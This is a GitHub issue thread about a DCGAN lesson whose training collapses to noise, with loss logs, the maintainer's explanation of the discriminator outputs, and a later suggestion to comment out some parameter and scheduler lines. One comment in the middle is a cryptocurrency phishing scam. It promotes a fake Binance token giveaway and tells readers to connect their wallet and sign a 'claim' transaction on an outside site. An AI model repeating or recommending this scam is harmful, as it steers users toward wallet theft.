### ISSUE TITLE
about lesson8:DCGAN

### ISSUE THREAD

**Issue by backkon** [zhangxiann/PyTorch_Practice#1]
Why do I get the log as shown below:
```
[0/20][0/32]	Loss_D: 1.8010	Loss_G: 8.0963	D(x): 0.4317	D(G(z)): 0.3617 / 0.0005
[0/20][10/32]	Loss_D: 7.5290	Loss_G: 38.1183	D(x): 0.9269	D(G(z)): 0.9958 / 0.0000
[0/20][20/32]	Loss_D: 0.0425	Loss_G: 58.4481	D(x): 0.9731	D(G(z)): 0.0000 / 0.0000
[0/20][30/32]	Loss_D: 0.2492	Loss_G: 57.3842	D(x): 0.9787	D(G(z)): 0.0000 / 0.0000
[1/20][0/32]	Loss_D: 0.0000	Loss_G: 56.7433	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
[1/20][10/32]	Loss_D: 0.0000	Loss_G: 56.9849	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
[1/20][20/32]	Loss_D: 0.0001	Loss_G: 56.8024	D(x): 0.9999	D(G(z)): 0.0000 / 0.0000
[1/20][30/32]	Loss_D: 0.0000	Loss_G: 57.0740	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
```
The outputs have always been noise, I am running according to the source code, where is the problem?

**Comment by zhangxiann** [comment]
I haven`t encountered this problem.
here is my log:
```
[0/20][0/32]	Loss_D: 2.2277	Loss_G: 15.5083	D(x): 0.5273	D(G(z)): 0.6209 / 0.0000
[0/20][10/32]	Loss_D: 0.2962	Loss_G: 46.8450	D(x): 0.9128	D(G(z)): 0.0000 / 0.0000
[0/20][20/32]	Loss_D: 0.0020	Loss_G: 52.9141	D(x): 0.9982	D(G(z)): 0.0000 / 0.0000
[0/20][30/32]	Loss_D: 0.2574	Loss_G: 51.1907	D(x): 0.9840	D(G(z)): 0.0000 / 0.0000
[1/20][0/32]	Loss_D: 0.0000	Loss_G: 51.1631	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
[1/20][10/32]	Loss_D: 0.0005	Loss_G: 51.2719	D(x): 0.9995	D(G(z)): 0.0000 / 0.0000
[1/20][20/32]	Loss_D: 0.0001	Loss_G: 50.5107	D(x): 0.9999	D(G(z)): 0.0000 / 0.0000
[1/20][30/32]	Loss_D: 0.0000	Loss_G: 50.6817	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
[2/20][0/32]	Loss_D: 0.0000	Loss_G: 50.4814	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
[2/20][10/32]	Loss_D: 0.0000	Loss_G: 50.3472	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
[2/20][20/32]	Loss_D: 0.0000	Loss_G: 50.2126	D(x): 1.0000	D(G(z)): 0.0000 / 0.0000
```
Perhaps you can try to run more epochs.

**Comment by backkon** [comment]
Your log is about the same as mine. Why is D(G(z)) 0/0? The second term of D(G(z)) should be getting closer and closer to 1?

**Comment by zhangxiann** [comment]
- `D(G(z))` denotes the predicted probability of generate(fake) images.
- `D(x)` denotes the predicted probability of real images.
I think, for the discriminator，it should try to distinguish the real and fake images.
So the `D(x)` is getting closer to 1, the `D(G(z))` is getting closer to 0.

**Comment by backkon** [comment]
I got results as shown below:
![屏幕截图 2020-10-22 104309](https://user-images.githubusercontent.com/31430570/96818103-65576700-1453-11eb-92df-c6d641a7a126.jpg)
![loss](https://user-images.githubusercontent.com/31430570/96818164-8029db80-1453-11eb-978f-bcdd43756578.png)

**Comment by zhangxiann** [comment]
Wait, I will try to find out waht`s happening.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by wangrongcheng** [comment]
需要修改：
ngf = 64
ndf = 64
这两行注释掉
lr_scheduler_d.step()
lr_scheduler_g.step()

![Image](https://github.com/user-attachments/assets/2ba321e8-655a-426f-ab22-2a08bfc290b7)
![Image](https://github.com/user-attachments/assets/2a99e81c-3108-4ab2-8b2d-2aedfaaaa913)
